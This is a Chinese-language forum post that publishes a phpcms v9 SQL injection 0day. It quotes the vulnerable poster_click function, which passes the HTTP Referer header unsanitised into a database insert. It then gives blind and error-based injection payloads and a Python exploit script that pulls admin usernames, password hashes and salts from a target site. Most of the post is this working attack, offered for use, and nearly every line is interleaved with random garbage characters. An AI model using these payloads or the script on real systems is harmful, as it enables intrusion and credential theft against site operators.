有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:( q, n4 I% v5 y
9 S6 }+ @, \6 ?4 ^& c
问题函数\phpcms\modules\poster\index.php
2 \0 e! d3 s9 V1 v$ j( A
6 y {7 x5 Y9 ~public function poster_click() {
/ Z' e7 D( |- l5 ^! L* A# p$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
" E. P9 `& ~3 ~6 d, J7 M* {$r = $this->db->get_one(array('id'=>$id));, g5 m) ] c0 L6 t
if (!is_array($r) && empty($r)) return false;, b7 m m8 K% k
$ip_area = pc_base::load_sys_class('ip_area');
" t l! r6 Z9 O$ip = ip();
% K$ C% u& r, }5 r5 w: I$ l$area = $ip_area->get($ip);
- J. Y+ u) A% {+ s$username = param::get_cookie('username') ? param::get_cookie('username') : '';$ n! R/ r, f8 _# j; w" L% L! {
if($id) {0 Z7 w% e% O4 N' \+ V; @; X
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();4 O( W4 k$ z! M# H2 j
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
( u% z+ A/ ~, i O# {$ y}
/ r9 E( h- M! S( y& Z* t5 C4 x$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
( b( M9 H8 d {5 z$setting = string2array($r['setting']);
$ h/ y. W* L( @& ]" W) Y; Pif (count($setting)==1) {( f/ J: C# P* y: f. ]. u- e
$url = $setting['1']['linkurl'];, _3 x4 Y! W; w! i6 z
} else {
- n, q% Q5 r9 w3 z B$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];) h( Q8 y& w4 J
}
; y4 y# W- R8 ^( F2 }header('Location: '.$url);- Q2 ~) C" V6 j* G
}
& o! ~# {+ O5 T' \
, ~, Q) @2 G/ v
" q# F4 o) W' y9 \- U; b7 P3 i
" [5 c1 c q, f9 U+ E, U( D! l利用方式:
2 c9 `- a3 N5 k& t# i3 \6 N B
8 |- ]" g3 {0 c) @1、可以采用盲注入的手法:
! c5 P' u6 ^* E& w+ K6 F$ b2 @2 n9 ]; _0 d
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
& T1 ?" `$ N3 Z1 L0 H# h% t
2 P F' k% v2 M9 g% m通过返回页面,正常与否一个个猜解密码字段。
d9 Y; w! J2 T8 u
" i( i; g; k$ g3 C; }2、代码是花开写的,随手附上了:
W( W/ _ v+ K# J% \7 w8 c
. _ ?$ D! u3 o( @% ^& _1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#) i9 D) U2 S1 u: t5 G g8 O# F/ i
5 w7 U. E* s5 f/ R) H7 D
此方法是爆错注入手法,原理自查。( q. M' _6 C z0 Z
: ]: j, U( o: i! R* _% N. j- `; @
' B2 A) D4 f9 d- ^8 ?1 J3 ~. V: W3 O! Z) m2 d
利用程序:
4 L8 u6 \: P* p5 X* H( T/ i$ Y! e0 h% v$ R
#!/usr/bin/env python
7 M* B' H( }9 `/ ~' a8 ~, @0 Timport httplib,sys,re: \) F7 b+ Z1 \. T
* H% F% d! Y; rdef attack():
' y ^( p; W$ Y" s( {+ Q9 Zprint “Code by Pax.Mac Team conqu3r!”
' L3 c4 {0 ?3 _print “Welcome to our zone!!!”. f b' y: u5 ]; V6 [$ R! ~6 b, _
url=sys.argv[1]
. K" A$ _9 Y8 l# c+ tpaths=sys.argv[2]
' h/ I+ }3 L$ t' G9 I6 Nconn = httplib.HTTPConnection(url)
+ X/ }/ n0 t8 c' {' t9 Hi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
! q7 h: _ a# y% K3 i“Accept”: “text/plain”,
9 O% J$ l" m* H5 O“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}. K! A6 j) x) E$ L
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
( H |' d% f! ^: Q0 Rr1 = conn.getresponse()3 q2 l: @+ \) _) L+ O
datas=r1.read()$ n) v' Y5 z9 |( u! e; R
datas=re.findall(r”Duplicate entry \’\w+’”, datas)/ R% q& }5 K1 h! ?. H
print datas[0]* [8 s8 A6 B6 @) w4 ` w# P# U* W
conn.close()
5 J6 K2 j- C$ ?% P- Vif __name__==”__main__”:
# K/ X- U) S/ g, Cif len(sys.argv)<3:" Y1 ^) f, _) d( S0 T0 l1 u
print “Code by Pax.Mac Team conqu3r”" t$ \8 ]- J( T2 P
print “Usgae:”7 I" ^& F" K3 u# m) Q: H& y
print “ phpcmsattack.py www.paxmac.org /”8 ?( m: h n/ ~, D% x
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
7 K: i* }* x, s5 Ysys.exit(1)
9 k6 Z7 s, X# U7 a5 s$ Q cattack()
! A3 R& S% j. K; ]0 e5 v- E* b w Y) P+ M
|
发表于 2013-1-11 21:01:00
收藏
支持
反对